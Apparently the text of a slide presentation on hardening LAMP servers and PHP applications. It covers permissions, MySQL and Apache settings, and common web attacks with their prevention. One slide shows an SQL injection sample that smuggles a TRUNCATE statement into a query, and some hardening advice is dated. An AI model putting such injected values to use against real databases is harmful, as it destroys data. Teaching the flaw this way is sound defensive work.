2. Who Am I?
Name: Richard Peter Ong a.k.a. Arpee
Work: Lead Developer, Internal
Projects at SysIQ Inc.
Open Source
Affiliations:
a.)core developer, MiaCMS
3. Who Are you?
✔ PHP Developers/Programmers
✔ L/U/W AMP SysAdmins
✔ IT Managers and Practitioners
✔ Geeks and hackers..
4. Scope and Coverage:
● Securing a Basic U/L AMP
Server
● Web Application Attacks
Description, Samples and
Prevention
5. WHAT IS A WEB APPLICATION?
✔ Any application that is served
commonly via http or https
protocol
✔ Usually being served from a
remote computer acting as a
host/server
6. WHAT IS SECURITY?
✔ Is a State of being free from
damage and being compromised
✔ Is a condition of being
protected against danger or loss
10. Filesystem::
File Ownership and Permission
✔ Folders should be 0755
✔ Files should be 0644
✔ Files and Folders under
Document Root should be
owned by the Apache User
✔ 666 is evil, in the web
world well, so as 777.
11. Filesystem::
How to Set Permissions
✔ Folders
chmod 0755 {directory}
✔ Files
chmod 0644 {files}
13. Firewall::
Opened Ports
✔ Port 80 Web/Http
✔ Port 443 Web/Https
✔ Port 21 FTP
✔ Port 22 SSH
✔ Port 25 SMTP (outgoing)
✔ Port 110 POP (inbound)
✔ Port 3306 MySQL Daemon
14. Secure httpd (Apache):
✔ Set an apache user
✔ Do not run apache as root
rd
✔ 3 Party Tools:
✔ ModSecurity
http://www.modsecurity.org/
15. Secure the mysqld (MySQL):
✔ Set root(admin) password
✔ Rename the root(admin)
account
✔ Restrict Network Access
✔ Use SSH Tunneling/Port
Forwarding if necessary
16. MySQL::
Set Admin Password
mysql -u root
mysql> SET PASSWORD FOR
root@localhost=PASSWORD('passw
ord');
mysql> FLUSH PRIVILEGES;
17. MySQL::
Change Admin Username
mysql -u root -p{PASSWORD}
mysql> update user set
user=quot;mydbadminquot; where
user=quot;rootquot;;
mysql> FLUSH PRIVILEGES;
18. MySQL::
Why Restrict Network Access?
✔Usually only your web
application needs access to
MySQL Server, NOTHING ELSE.
19. MySQL::
How to Restrict Network Access?
✔ Open my.cnf
✔ Add skip-networking
parameter to mysqld or
mysqld_safe (depending which
you are using)
20. MySQL::
How to tunnel mysql via ssh?
ssh -N -f -L 3306:localhost:3306 user@mysql_server.com
N Do not execute command (useful
for port forwarding only)
f Run in background
L (port:host:hostport)
22. PHP::
Functions to disable
✔ Exec() - executes a command
✔ Passthru() - execute a
command and display raw output
23. PHP::
Register Globals
✔ DO NOT ENABLE
register_globals
✔ Write your apps to use
SuperGlobals instead in
initializing variables and its
values whenever necessary.
($_GET, $_POST, $_REQUEST and
$_SERVER)
24. PHP::
allow_url_fopen, allow_url_include
✔ Allow_url_fopen if set to
on, allows treatment of URLs
as files
✔ Allow_url_include - if set
to on, allows include/require
to open URLs (like http:// or
ftp://) as files.
27. Application Level Security::
Remote File Inclusion
Attack Description
A Remote File Inclusion is a
type of attack where an
Remote File attacker executes a php
Inclusion script of his liking against
the target web application
28. Application Level Security::
Remote File Inclusion
Attack Possible Damage
● Expose/Modiy variable
values of the script doing
Remote File the include()
Inclusion ● Expose stored credentials
eg. MySQL user/pass from a
webapp configuration file
29. Application Level Security::
Remote File Inclusion
Attack Vectors
● User-controllable value of
Remote File
variable called by
Inclusion
include() or require()
30. Application Level Security::
Remote File Inclusion
Attack Prevention
● Disable register_globals
● Disable allow_url_fopen
Remote File ● Disable allow_url_include
Inclusion ● Do not include() from a
dynamic variable with
user controllable value
31. Application Level Security::
Form Spoofing
Attack Description
A type of an attack where
an HTML Form is mimicked
Form Spoofing or copied and then
submitted from a location
different from the original
32. Application Level Security::
Form Spoofing
Attack Possible Damage
● Bypass client-side
validation
● Mass data insertion
Form Spoofing
resulting to flood (eg.
Flooded guestbooks, forum
boards etc.)
33. Application Level Security::
Form Spoofing
Attack Vectors
● No Form Tokens present,
thus all requests thrown
Form Spoofing
to the accepting script is
considered valid
35. Application Level Security::
XSS
Attack Description
Cross-Site scripting is a type
of attack where an attacker
inserts html code into the
html output of the
webapplication, usually a
XSS client-side code such as
javascript. The injected
html/js code script is then
executed on the user browsers
visiting the infiltrated web
application
36. Application Level Security::
XSS
Attack Possible Damage
● Steal/Fixate browser
cookies and direct to
another page
XSS ● Redirect user to another
page
● Mess up a format of web
application page
38. Application Level Security::
XSS
Attack Prevention
● Do Not Trust User Input
Is not enough, I say,
XSS
Make User Input Trustable
● Filter incoming data
39. Application Level Security::
CSRF
Attack Description
Cross-Site Request
Forgery is a type of
attack where an attacker
CSRF forces an unknowing
victim into making
(malicious) http
requests
40. Application Level Security::
CSRF
Attack Possible Damage
● Make victim execute an
operation without his
knowledge on a web
CSRF application while being
validy authenticated (eg.
Change Account details,
logout, spam etc.
41. Application Level Security::
CSRF
Attack Vectors
● XSS Vulnerabilities
● Untokenized forms
CSRF ● Usage of $_GET for
operations where $_POST
may be best suited
42. Application Level Security::
CSRF
Attack Prevention
● Use $_POST instead of $_GET
and/or $_REQUEST
CSRF ● Filter incoming data
● Tokenize
43. Application Level Security::
SQL Injection
Attack Description
An SQL Injection is an
attack where an attacker
is able to execute
SQL Injection arbitrary sql code
against the database
44. Application Level Security::
SQL Injection: Basic Sample
//legit
$sort = 'ASC';
//malicious injection?
$sort = '; TRUNCATE POSTS';
//actual query
$query = quot;SELECT * FROM posts ORDER BY
date_entered $sortquot;;
// Output Query: uh-oh!
SELECT * FROM posts ORDER BY
date_entered; TRUNCATE POSTS
45. Application Level Security::
SQL Injection
Attack Possible Damage
● Corrupt data by executing
truncate()
SQL Injection ● Alter current DB data (eg.
Change admin password)
46. Application Level Security::
SQL Injection
Attack Vectors
● Dynamic queries getting
SQL Injection values from unsanitized
user-submitted data
48. Application Level Security::
Session Hijacking
Attack Description
Session Hijacking is an
attack where an attacker
impersonates a legitimate
Session user(commonly the
Hijacking administrator) that is
currently logged in on the
web application
49. Application Level Security::
Session Hijacking
Attack Possible Damage
● Attacker gaining
Session administrator privileges,
Hijacking damage/threat is highly
serious.
50. Application Level Security::
Session Hijacking
Attack Vectors
● Session ID Fixation via XSS
● Web Application is not going
Session thru HTTPS and therefore
Hijacking sniffable
● Session id is not
regenerated when necessary
51. Application Level Security::
Session Hijacking
Attack Prevention
● Protect Site against XSS
attacks (Fixation
avoidance only)
● Regenerate SID whenever
Session necessary and do not
Hijacking trust user-specified
session id
● Deliver the web app
Over HTTPS to avoid
getting sniffed
52. In a nutshell:
● The Server Level is part of the Web
Application. It is necessary to Secure
the Server as well. 30% of Web
Application Attacks are still suffered
by the Server.
● Do not Trust User Input is not
enough, Make User Input TRUSTABLE by
filtering methods before they undergo
processing.
● Tokenize your forms whenever necessary
● Use SSL Layer (via https) in dealing
with highly sensitive data to avoid
being sniffed or captured .